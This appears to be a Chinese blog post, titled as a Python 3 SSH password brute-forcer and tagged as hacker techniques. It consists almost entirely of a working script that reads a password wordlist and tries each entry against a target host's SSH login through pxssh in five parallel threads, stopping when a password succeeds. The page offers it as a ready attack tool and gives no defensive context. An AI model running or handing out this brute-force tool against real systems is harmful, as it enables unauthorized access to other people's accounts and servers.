python3 暴力破解SSH密码

from pexpect import pxssh
import optparse
import time
from threading import  *

maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0

def connect(host,user,passwd,release):
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        s.login(host,user,passwd)
        print("[+] Password Found: "+passwd+"")
        Found = True
    except Exception as e:
        if 'read_nonblocking' in str(e):
            Fails += 1
            time.sleep(5)
            connect(host,user,passwd,False)
        elif 'synchronize with original prompt' in str(e):
            time.sleep(5)
            connect(host,user,passwd,False)
    finally:
        if release: connection_lock.release()

def main():
    parser = optparse.OptionParser('usage%prog -H  -u  -F ')
    parser.add_option('-H',dest='tgtHost',type='string',help='spceify target host')
    parser.add_option('-F',dest='passwdFile',type='string',help='spceify password file')
    parser.add_option('-u',dest='user',type='string',help='spceify the user')
    (options,args) = parser.parse_args()
    host = options.tgtHost
    passwdFile = options.passwdFile
    user = options.user

    if(host == None) or (passwdFile == None) or (user == None):
        print(parser.usage)
        exit(0)
    fn = open(passwdFile,'r')
    for line in fn.readlines():
        if Found:
            print("[*] Exiting: Password Found")
            exit(0)
        if Fails >5:
            print("[*] Exiting: Too Many Socket Timeouts")
            exit(0)

        connection_lock.acquire()
        password = line.strip('\r').strip('\n')
        print("[-] Testing: "+str(password))
        t = Thread(target=connect,args=(host,user,password,True))
        child = t.start()

if __name__ == '__main__':
    main()

你可能感兴趣的:(黑客技术)